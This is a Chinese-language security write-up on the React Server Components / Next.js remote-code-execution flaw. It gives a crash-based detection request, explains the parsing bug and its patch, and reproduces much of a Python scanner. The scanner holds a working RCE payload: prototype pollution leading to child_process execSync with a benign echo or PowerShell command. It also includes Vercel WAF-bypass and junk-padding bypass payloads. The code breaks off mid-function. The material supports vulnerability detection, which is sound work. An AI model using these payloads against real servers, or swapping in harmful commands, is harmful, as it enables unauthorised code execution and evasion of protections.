下面的方法将力求提供一种既安全又高可信的HTTP请求, 用于确认Next.js应用中是否存在该RCE漏洞。 以下HTTP请求可用于确认该漏洞是否存在:
POST / HTTP/1.1Host: hostnameUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0Next-Action: xX-Nextjs-Request-Id: b5dce965Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5DContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3SadX-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9Content-Length: 232
------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"
{}------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"
["$1:a:a"]------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
当向存在漏洞的Next.js版本发送上述请求时,其 HTTP 响应将类似如下:
HTTP/1.1 500 Internal Server ErrorDate: Thu, 04 Dec 2025 06:16:39 GMTContent-Type: text/x-componentConnection: keep-aliveCache-Control: no-store, must-revalidate, no-cache, max-age=0Vary: rscContent-Length: 76
0:{"a":"$@1","f":"","b":"yd-J8UfWl70zwtaAy83s7"}1:E{"digest":"2971658870"}
通过检查是否返回 包含 E{"digest" 的内容并且 HTTP 状态码为 500,可以在你的环境中可靠地识别出存在漏洞的主机。
该检测之所以能够区分易受攻击与不易受攻击的主机,是因为React Server 依赖在处理对象属性时,使用冒号(:)作为分隔符。参考下面的代码片段:
function getOutlinedModel<T>( response: Response, reference: string, parentObject: Object, key: string, map: (response: Response, model: any, parentObject: Object, key: string) => T,): T { const path = reference.split(':');// ... snip ... for (let i = 1; i < path.length; i++) { value = value[path[i]]; }
例如,如果在 multipart 请求中传入如下 JSON:
------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"
["$1:a:b"]------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"
{"a":{"b":"foo"}}------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
它会被转换为如下形式:
"$1:a:b" -> {"a":{"b":"foo"}}.a.b -> "foo"
在存在漏洞的 React Server 版本中,可以通过以下 multipart 请求强制触发一个 500 错误:
------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"
["$1:a:a"]------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"
{}------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
之所以会抛出异常,是因为最终它会映射为如下结构:
"$1:a:a" -> {}.a.a -> (undefined).a -> 500
在已修复的 React Server Components 版本中,针对这种冒号语法新增了一层校验,从而防止程序发生崩溃:
const name = path[i]; if (typeof value === 'object' && hasOwnProperty.call(value, name)) { value = value[name]; }
这意味着,如果 : 语法引用了一个不存在的属性,该引用会被忽略。因此,在补丁修复后,将不再返回 500 错误。
按照以上思路编写的检测程序如下:
#!/usr/bin/env python3# /// script# requires-python = ">=3.9"# dependencies = [# "requests>=2.28.0",# "tqdm>=4.64.0",# ]# ///"""React2Shell Scanner - High Fidelity Detection for RSC/Next.js RCECVE-2025-55182 & CVE-2025-66478
Based on research from Assetnote Security Research Team."""
import argparseimport sysimport jsonimport osimport randomimport reimport stringfrom datetime import datetime, timezonefrom concurrent.futures import ThreadPoolExecutor, as_completedfrom urllib.parse import urlparsefrom typing import Optional, Tuple
try: import requests from requests.exceptions import RequestExceptionexcept ImportError: print("Error: 'requests' library required. Install with: pip install requests") sys.exit(1)
try: from tqdm import tqdmexcept ImportError: print("Error: 'tqdm' library required. Install with: pip install tqdm") sys.exit(1)
class Colors: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" MAGENTA = "\033[95m" CYAN = "\033[96m" WHITE = "\033[97m" BOLD = "\033[1m" RESET = "\033[0m"
def colorize(text: str, color: str) -> str: """Apply color to text.""" return f"{color}{text}{Colors.RESET}"
def print_banner(): """Print the tool banner.""" banner = f"""{Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET}""" print(banner)
def parse_headers(header_list: Optional[list[str]]) -> dict[str, str]: """Parse a list of 'Key: Value' strings into a dict.""" headers = {} if not header_list: return headers for header in header_list: if ": " in header: key, value = header.split(": ", 1) headers[key] = value elif ":" in header: key, value = header.split(":", 1) headers[key] = value.lstrip() return headers
def normalize_host(host: str) -> str: """Normalize host to include scheme if missing.""" host = host.strip() if not host: return "" if not host.startswith(("http://", "https://")): host = f"https://{host}" return host.rstrip("/")
def generate_junk_data(size_bytes: int) -> tuple[str, str]: """Generate random junk data for WAF bypass.""" param_name = ''.join(random.choices(string.ascii_lowercase, k=12)) junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes)) return param_name, junk
def build_safe_payload() -> tuple[str, str]: """Build the safe multipart form data payload for the vulnerability check (side-channel).""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
body = ( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f"{{}}\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f'["$1:aa:aa"]\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" )
content_type = f"multipart/form-data; boundary={boundary}" return body, content_type
def build_vercel_waf_bypass_payload() -> tuple[str, str]: """Build the Vercel WAF bypass multipart form data payload.""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
part0 = ( '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":' '"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;' 'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",' '"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}' )
body = ( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f"{part0}\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f'"$@0"\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="2"\r\n\r\n' f"[]\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="3"\r\n\r\n' f'{{"\\"\u0024\u0024":{{}}}}\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" )
content_type = f"multipart/form-data; boundary={boundary}" return body, content_type
def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]: """Build the RCE PoC multipart form data payload.""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
if windows: # PowerShell payload - escape double quotes for JSON cmd = 'powershell -c \\\"41*271\\\"' else: # Linux/Unix payload cmd = 'echo $((41*271))'
prefix_payload = ( f"var res=process.mainModule.require('child_process').execSync('{cmd}')" f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT')," f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});" )
part0 = ( '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"' + prefix_payload + '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}' )
parts = []
# Add junk data at the start if WAF bypass is enabled if waf_bypass: param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n' f"{junk}\r\n" )
parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f"{part0}\r\n" ) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f'"$@0"\r\n' ) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="2"\r\n\r\n' f"[]\r\n" ) parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")
body = "".join(parts) content_type = f"multipart/form-data; boundary={boundary}" return body, content_type
def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str: """Follow redirects only if they stay on the same host.""" current_url = url original_host = urlparse(url).netloc
for _ in range(max_redirects): try: response = requests.head( current_url, timeout=timeout, verify=verify_ssl, allow_redirects=False ) if response.status_code in (301, 302, 303, 307, 308): location = response.headers.get("Location") if location: if location.startswith("/"): # Relative redirect - same host, safe to follow parsed = urlparse(current_url) current_url = f"{parsed.scheme}://{parsed.netloc}{location}" else: # Absolute redirect - check if same host new_host = urlparse(location).netloc if new_host == original_host: current_url = location else: break # Different host, stop following else: break else: break except RequestException: break return current_url
def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> Tuple[Optional[requests.Response], Optional[str]]: """Send the exploit payload to a URL. Returns (response, error).""" try: # Encode body as bytes to ensure proper Content-Length calculation # and avoid potential encoding issues with the HTTP client body_bytes = body.encode('utf-8') if isinstance(body, str) else body response = requests.post( target_url, headers=headers, data=body_bytes, timeout=timeout, verify=verify_ssl, allow_redirects=False ) return response, None except requests.exceptions.SSLE